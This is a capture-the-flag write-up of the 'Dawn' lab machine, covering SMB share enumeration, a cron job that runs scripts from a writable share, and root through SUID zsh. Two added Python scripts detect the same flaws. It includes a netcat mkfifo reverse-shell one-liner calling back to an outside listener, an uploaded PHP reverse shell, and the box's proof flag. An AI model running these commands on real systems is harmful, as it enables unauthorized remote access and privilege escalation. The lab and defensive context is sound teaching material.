pg-dawn-play

Dawn

Nmap
sudo nmap 192.168.55.11 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWN

On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.

kali@kali:~/dawn$ smbclient -U '' -L \\\\192.168.55.11\\
Enter WORKGROUP\'s password:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
kali@kali:~/dawn$

Connecting then directly to the ITDEPT share.

kali@kali:~/dawn$ smbclient -U '' \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\'s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020

7158264 blocks of size 1024. 3518364 blocks available
smb: \>

I then used curl to test for file upload on the share and confirmed I was able to upload a PHP reverse shell, which might come in handy later.
kali@kali:~/dawn$ curl --upload-file rev.php -u '' smb://192.168.55.11/ITDEPT//rev.php
Enter host password for user '':
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5496 0 0 100 5496 0 536k --:--:-- --:--:-- --:--:-- 596k
kali@kali:~/dawn$
Running dirsearch.py on port 80 reveals two interesting directories.
python3 dirsearch.py -u http://192.168.152.11 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url

Moving into logs shows a list of logs, where management.log is the only one we have permission to access.

When reading the log file, the lines below appear frequently.

2020/08/12 09:25:0 CMD: UID=33 PID=1360 | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359 | /bin/sh -c /home/dawn/ITDEPT/product-control

Knowing that we have write access to the ITDEPT share, we can upload a reverse shell, call it web-control, and in theory this should execute.
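The two management.log lines are exactly the pattern a defender should be alerting on: a scheduled job (UID 33 and UID 1000) running a script whose path sits under a directory that anonymous SMB users can write to. The following Python script is an added example, not part of the original write-up, that parses records in the management.log format shown above and flags any command that references a file beneath a writable share root. The share root /home/dawn/ITDEPT is taken from the log; the inventory of writable share roots and the extra sample lines are constructed assumptions.

```python
import re
import shlex
from typing import Dict, List, Optional

# Constructed sample in the same record format as the management.log excerpt
# above; the third and fourth lines are added here to show an entry that is
# not flagged and a line that is not a CMD record at all.
SAMPLE_LOG = """\
2020/08/12 09:25:0 CMD: UID=33 PID=1360 | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359 | /bin/sh -c /home/dawn/ITDEPT/product-control
2020/08/12 09:26:0 CMD: UID=0 PID=1361 | /bin/sh -c /usr/local/sbin/rotate-logs
2020/08/12 09:26:0 some other log record that is skipped
"""

# Local directories backing SMB shares that anonymous users can write to.
# Assumed inventory: the write-up shows ITDEPT is writable and its scripts
# live under /home/dawn/ITDEPT.
WRITABLE_SHARE_ROOTS = ["/home/dawn/ITDEPT"]

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+) PID=(?P<pid>\d+) \| (?P<cmd>.*)$"
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one CMD record into timestamp, uid, pid and command text."""
    m = LINE_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def path_under(path: str, root: str) -> bool:
    """True if path is root itself or lies somewhere beneath it."""
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def share_paths_in(cmd: str, roots: List[str]) -> List[str]:
    """Argument tokens of cmd that point into a writable share directory."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        tokens = cmd.split()
    return [t for t in tokens if any(path_under(t, r) for r in roots)]


def find_share_executions(log_text: str,
                          roots: List[str] = WRITABLE_SHARE_ROOTS) -> List[Dict]:
    """Return every CMD record whose command runs something from a writable share."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = share_paths_in(rec["cmd"], roots)
        if hits:
            findings.append({
                "ts": rec["ts"],
                "uid": int(rec["uid"]),
                "pid": int(rec["pid"]),
                "paths": hits,
            })
    return findings


if __name__ == "__main__":
    for f in find_share_executions(SAMPLE_LOG):
        print(f"{f['ts']} uid={f['uid']} pid={f['pid']} runs "
              f"{', '.join(f['paths'])} from a writable share")
```

Run against a real management.log, the two flagged records are the ones the write-up exploits; the fix on the host side is either to stop the scheduler from executing anything under a share directory or to make the share read-only for unauthenticated users (in both cases the script stops producing findings).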

Firstly I created a file called web-control and inserted a netcat reverse shell into it.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.200 9001 >/tmp/f

This was then uploaded to the SMB share.

smb: \> put web-control 
putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s)
smb: \> ls
. D 0 Thu Sep 2 09:34:20 2021
.. D 0 Wed Jul 22 13:19:41 2020
rev.php A 5496 Thu Sep 2 09:13:41 2021
web-control A 83 Thu Sep 2 09:38:54 2021

7158264 blocks of size 1024. 3518292 blocks available
smb: \>

After doing so I soon receive a shell back on my netcat listener.

kali@kali:~/dawn$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
Next I searched for SUID binaries and found that zsh has the SUID bit set.
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
As zsh is a shell binary, all we need to do is execute its full path to gain a root shell (euid=0).
www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# id 
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# cd /root 
cd /root
dawn# ls 
ls
flag.txt proof.txt
dawn# cat flag.txt 
cat flag.txt
Your flag is in another file...
dawn# cat proof.txt 
cat proof.txt
04bf91ebc2de37fbee66338c45a80b95
dawn#
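A SUID bit on an interpreter or shell is the kind of misconfiguration a periodic host audit catches in seconds. The script below is an added example (not code from the write-up) that reads a SUID listing such as the `find / -perm -4000` output above, compares it against an assumed Debian baseline, and reports anything that is a shell/interpreter, lives outside the system directories, or is missing from the baseline. The sample listing is constructed from the write-up's output; the baseline set and the `collect_suid` helper for live hosts are assumptions, not something the write-up describes.

```python
import os
import stat
from typing import Dict, Iterable, List

# SUID listing constructed from the `find / -perm -4000` output in the write-up.
SAMPLE_FIND_OUTPUT = """\
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
"""

# Assumed baseline: SUID files a stock Debian 10 host is expected to carry.
# Anything not in this set is reported; keep it in version control per host class.
EXPECTED_SUID = {
    "/usr/sbin/mount.cifs", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/su", "/usr/bin/newgrp",
    "/usr/bin/pkexec", "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/gpasswd", "/usr/bin/chsh", "/usr/bin/fusermount", "/usr/bin/umount",
    "/usr/bin/chfn",
}

# Basenames that hand the caller an interactive or scripting environment;
# a SUID bit on any of these is effectively a root shell for every local user.
SHELLS_AND_INTERPRETERS = {
    "sh", "bash", "zsh", "dash", "ksh", "csh", "tcsh", "fish",
    "python", "python2", "python3", "perl", "ruby", "php", "node",
    "vi", "vim", "find", "env",
}

# Directories where package-managed SUID helpers legitimately live.
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/lib/", "/lib64/", "/usr/")


def classify(path: str, expected: Iterable[str] = EXPECTED_SUID) -> List[str]:
    """Reasons a SUID entry deserves attention; empty list means it looks normal."""
    reasons = []
    if os.path.basename(path) in SHELLS_AND_INTERPRETERS:
        reasons.append("shell-or-interpreter")
    if not path.startswith(SYSTEM_PREFIXES):
        reasons.append("outside-system-dirs")
    if path not in expected:
        reasons.append("not-in-baseline")
    return reasons


def audit_suid(paths: Iterable[str],
               expected: Iterable[str] = EXPECTED_SUID) -> Dict[str, List[str]]:
    """Map each suspicious path to its list of reasons."""
    report = {}
    for p in paths:
        reasons = classify(p, expected)
        if reasons:
            report[p] = reasons
    return report


def collect_suid(root: str = "/") -> List[str]:
    """Walk the filesystem and return regular files with the SUID bit set.

    Unlike `find -perm -4000` this ignores directories, since Linux does not
    honour SUID on directories (the ITDEPT entry above is one such directory).
    """
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return sorted(found)


if __name__ == "__main__":
    # Replace SAMPLE_FIND_OUTPUT.split() with collect_suid() to audit the live host.
    for path, reasons in audit_suid(SAMPLE_FIND_OUTPUT.split()).items():
        print(f"{path}: {', '.join(reasons)}")
```

On the listing from this box the report contains exactly two entries, /usr/bin/zsh (a shell that is not in the baseline) and /home/dawn/ITDEPT (outside the system directories). Remediation is `chmod u-s /usr/bin/zsh` and, for the share directory, removing the bit and reviewing why it was set; the baseline approach also catches a SUID bit silently added to an otherwise ordinary binary, which a name-based check alone would miss.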